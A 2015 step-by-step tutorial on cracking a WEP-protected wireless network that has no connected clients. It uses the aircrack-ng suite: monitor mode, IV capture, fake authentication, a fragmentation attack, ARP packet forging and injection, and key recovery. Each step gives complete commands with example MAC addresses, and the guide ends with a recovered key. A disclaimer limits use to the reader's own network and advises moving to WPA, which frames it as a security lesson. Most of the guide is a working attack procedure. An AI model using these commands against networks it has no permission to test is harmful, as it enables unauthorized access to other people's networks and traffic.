:: INDEX :
  • Introduction
  • > Overview
    > Terms & Definitions
  • [ Step 1 ] : Configuring the network interface
  • [ Step 2 ] : Collecting the network info
  • [ Step 3 ] : Capturing data
  • [ Step 4 ] : Faking Authentication
  • [ Step 5 ] : Sniffing for packets
  • [ Step 6 ] : Forging & Injecting an ARP-Reply package
  • [ Step 7 ] : Decrypting the IVs

  • Introduction :
    This guide was created to demonstrate the encryption vulnerabilities of WEP (Wired Equivalent Privacy).

    Breaking into a protected wireless network is illegal!
    The content and instructions contained herein are for educational purposes, only. I did not break the law when creating this example. All information in the screenshots is that of my own networks that I compromised for this demonstration. You may attempt the steps outlined at your own risk - on your own network. If you wish to hack an other wireless network you must get permission from the network owner.

    Breaking a WEP key involves using network monitoring software to capture weak IVs (initialization vectors) and a cracking software to decrypt them. The software we will be using in this guide is the aircrack-ng suite that is included with Backtrack linux.
    There are several flavors of linux that come with this software including Auditor, Backtrack, and Kali linux.
    In this guide we will be using Backtrack 5 R3.

    Generally, the idea is to use your wireless adapter to capture any weak IVs being sent to/from the Access Point.
    We capture these IVs by intercepting and relaying ARP requests to the Access Point causing it to reply with more IVs.
    Once enough data (IVs) has been collected it can be decrypted using the Aircrack-ng software to display the wep key in plain text.

    This guide will explain how all of this takes place and outline the steps involved in a successful hack.
    [Intro] - Overview :
    In this scenario we are targetting a WEP encrypted network with open authentication that has no active clients connected.

    Of the two possible scenarios - this one is the most challenging as some routers may have additional security or unusual configurations that may prevent this method from working (such as MAC address filtering, or if the Access Point is not broadcasting any packets).

    In this scenario we are making 3 assumptions :
    	(1) You've got Backtrack running properly.
    	(2) The target network is using WEP (open).
    	(3) There are no clients connected to the Access point.

    The lesson to be learned from this demonstration is that WEP should be avoided whenever possible.
    Instead you should use WPA-PSK with a strong password consisting of both letters AND numbers.
    [Intro] - Terms & Definitions :
    There are a few terms used throughout this guide that are important to know when beginning the processes.

    MAC Address
    Access Point
    Network Interface
    Client / Station
    ARP Request

    A set of tools included with Backtrack. Includes aircrack, airodump, aireplay, airdecap, airolib.
    A unique combination of letters/numbers assigned as a "permanent" identifier to network hardware.
    The technical term for the "Router" or "Gateway". Also referred to as a "WAP".
    The MAC Address of the Access Point.
    The Broadcast name of the Access Point.
    The frequency at which data is being broadcast.
    The device used to send/receive data.   Example : wlan0 or mon0 .
    A computer/device connected/associated to an Access point.
    The process/data that is collected when monitoring an Access point with Airodump.
    Is a packet sent to/from the router/client in an to establish or maintain a connection.
    "Initialization Vectors" are packets that contain a small encrypted portion of the wep key.

    - Throughout this guide the terms Client and Station will be used interchangeably as they refer to the same thing.
    - The terms Password and Key will also be used interchangeably as they too mean the same thing.

    [Step 1] - Configuring the network interface :
    - When executing commands in the terminal it is necessary to declare which network interface you would like to use.
    - You can retrieve a list of available interfaces by entering the iwconfig command with no parameters.
      The Interface names will be listed in the left column.
    - Your wireless interface will be identified as an "IEEE 802.11" device.

    possible examples : wlan0 , wlan1 or rausb0 .

    - In this scenario we will need to know the MAC address of our network interface to associate with the Access Point.
    - We can locate the MAC address using the ifconfig command. The MAC address will be listed in the top line.
      Make note of this MAC address.

    - To configure our network interface we must set it to "monitor mode" using the iwconfig command.

  • iwconfig [Interface] mode monitor

  • Parameters:
    [Interface] Your wireless network interface / (wifi card) (wlan0, mon0, rausb0, etc).
    mode monitor Sets the network interface to monitor mode.

  • iwconfig wlan0 mode monitor

  • - If you receive an error stating that the device is busy then you will have to turn it off first using the ifconfig command.
      If so, you will also have to turn the device back on again after setting it to monitor mode.

  • ifconfig [Interface] down
  • ifconfig [Interface] up

  • - If you are unable to put your device into monitor mode using the iwconfig command - you can also try using the airmon-ng command.
    - Using airmon-ng will usually create a new device / interface to monitor traffic with. It's often named mon0.
    - In most cases iwconfig works just fine and it doesn't create any additional interfaces but airmon-ng will usually work when iwconfig does not.

  • airmon-ng start [Interface]

  • Example:
  • airmon-ng start wlan0

  • [Step 2] - Collecting the network info :
    - To perform the attack we must first gather a bit of information about the network.
      Everything we need can be collected using the airodump-ng command.

    - The required information includes:
  • The BSSID   (MAC Address of the target Access Point).
  • The ESSID   (Name of the Access Point).
  • The Channel that the Access Point is broadcasting on.

  • - After collecting the necessary information - you can terminate the airodump command by pressing Ctrl+C on the keyboard.
    - As you'll see in the see in the image below - Our selected target is using WEP which is vulnerable to our attack.

  • airodump-ng [Interface]

  • Parameters:
    [Interface] Your wireless network interface / (wifi card) (wlan0, mon0, rausb0, etc).

  • airodump-ng wlan0

  • [Step 3] - Capturing data :
    - Now that we have the required information - we can lock in on the Access Point and start capturing data.
    - This step also uses the airodump-ng command however we will add some parameters so that it saves traffic to a file.
    - The first parameter to specify is the channel. This is done with the -c [Channel] parameter.
    - The next parameter to specify is the output filename. This is done with the -w [Filename] parameter.
    - Another parameter we will use is the --ivs parameter. This tells airodump only to save the IVs in our capture.
    - This will display the same output as it did before but will be focused on a specified channel and will also save any traffic to our capture file.
    - The capture file automatically appends a number to the filename as well as a .ivs extension. Example: mycapture-01.ivs
    - This command should be kept running in the background while you complete the next steps. Do not terminate it.

  • airodump-ng -c [Channel] -w [Filename] --ivs [Interface]

  • Parameters:
    -c The channel the Access Point is broadcasting on.
    -w The output filename to write to.
    --ivs Save IVs to file.
    [Interface] Your wireless network interface / (wifi card) (wlan0, mon0, rausb0, etc).

  • airodump-ng -c 11 -w mycapture --ivs wlan0

  • [Step 4] - Faking Authentication :
    - To create our ARP request packet we must fake authentication & association to the Access Point.
    - We will do this using another aireplay-ng (-1) command in a new shell / tab.
    - Upon submitting the command - the shell should respond with a message stating that the authentication & association was successful.
    - If it is not successful it could possibly be due to the way the Access Point is configured (example: mac address filtering).

  • aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [Your MAC] [Interface]

  • Parameters:
    -1 "fake authentication" attack mode.
     0 Just once.
    -e ESSID (name) of target network.
    -a BSSID (MAC Address) of target network.
    -h Your MAC Address.
    [Interface] Your wireless network interface / (wifi card) (wlan0, mon0, rausb0, etc).

  • aireplay-ng -1 0 -e homenetwork -a 10:9F:A9:F4:F6:81 -h 00:22:75:3C:7E:26 wlan0

  • [Step 5] - Sniffing for packets :
    - Now that we are authenticated & associated - we must intercept any packets coming from the Access Point.
    - In this example we will be using a fragmentation attack (-5) with the aireplay-ng command to create our own ARP packet.
      We will do this by intercepting a packet from the Access Point and returning it in fragments in an attempt to retreive enough keystream to create our ARP packet.
    - This command should be started in a new shell / tab as we will need to leave it running. Do not terminate it.
    - Upon finding a usable packet - your listening aireplay-ng (-5) command will fragment and return the packets to gather keystream from the Access Point.
    - It will save the keystream as a .xor file and display the file name in your shell.
    - If you are unable to find any packets - you can try running the another fake authentication attack (-1) to re-associate with the Access Point.

  • aireplay-ng -5 -b [BSSID] -h [Your MAC] [Interface]

  • Parameters:
    -5 "Fragmentation" attack mode.
    -b BSSID (MAC Address) of target network.
    -h Your MAC Address.
    [Interface] Your wireless network interface / (wifi card) (wlan0, mon0, rausb0, etc).

  • aireplay-ng -5 -b 10:9F:A9:F4:F6:81 -h 00:22:75:3C:7E:26 wlan0

  • [Step 6] - Forging & Injecting an ARP-Reply Package :
    - Using the .xor file we saved - we can create an ARP-Reply package and inject it to the network to stimulate the flow of IVs.
    - This is performed using 2 separate commands.
      We will use packetforge-ng to create our ARP request packet and aireplay-ng (-2) to inject it.

  • packetforge-ng -0 -a [BSSID] -h [Your MAC] -w [ARP filename] -y [filename.xor] -k -l

  • Parameters:
    -a BSSID (MAC Address) of target network.
    -h Your MAC Address.
    -w Output file name for ARP package. Can be anything.
    -y Filename of generated .xor file.

  • packetforge-ng -0 -a 10:9F:A9:F4:F6:81 -h 00:22:75:3C:7E:26 -w arp-request -y fragment-1113-131848.xor -k -l

  • - Upon creating our ARP request packet we can inject it into the network using the aireplay-ng (-2) command :

  • aireplay-ng -2 -r [ARP filename] [Interface]

  • Parameters:
    -r ARP Packet filename created with the packetforge-ng command.
    [Interface] Your wireless network interface / (wifi card) (wlan0, mon0, rausb0, etc).

  • aireplay-ng -2 -r arp-request wlan0

  • [Step 7] - Decrypting the IVs :
    - After we have collected enough IVs we can begin decrypting the collected data.
      Usually about 100-200k is good for a 128 Bit wep key. 64 bit will work with much less.
    - We will crack the key using the aircrack-ng command.

    - Instead of specifying an exact number in the filename we will use a wildcard * (asterisk) to read all of our captured data.
      This is useful if you've ran airodump more than once resulting in multiple .ivs files.

  • aircrack-ng -e [ESSID] [Filename]

  • Parameters:
    -e ESSID (name) of target network.
    [Filename] The output file name created with the airodump-ng command.

  • aircrack-ng -e homenetwork mycapture*.ivs

  • - In this example - my computer decrypted the 128-bit WEP key with just 50,000 IVs.
    - The recovered password / key is : FF7CBB65FFBF6596E5BAD7656A .

    Copyright 2015 QuickFix PEI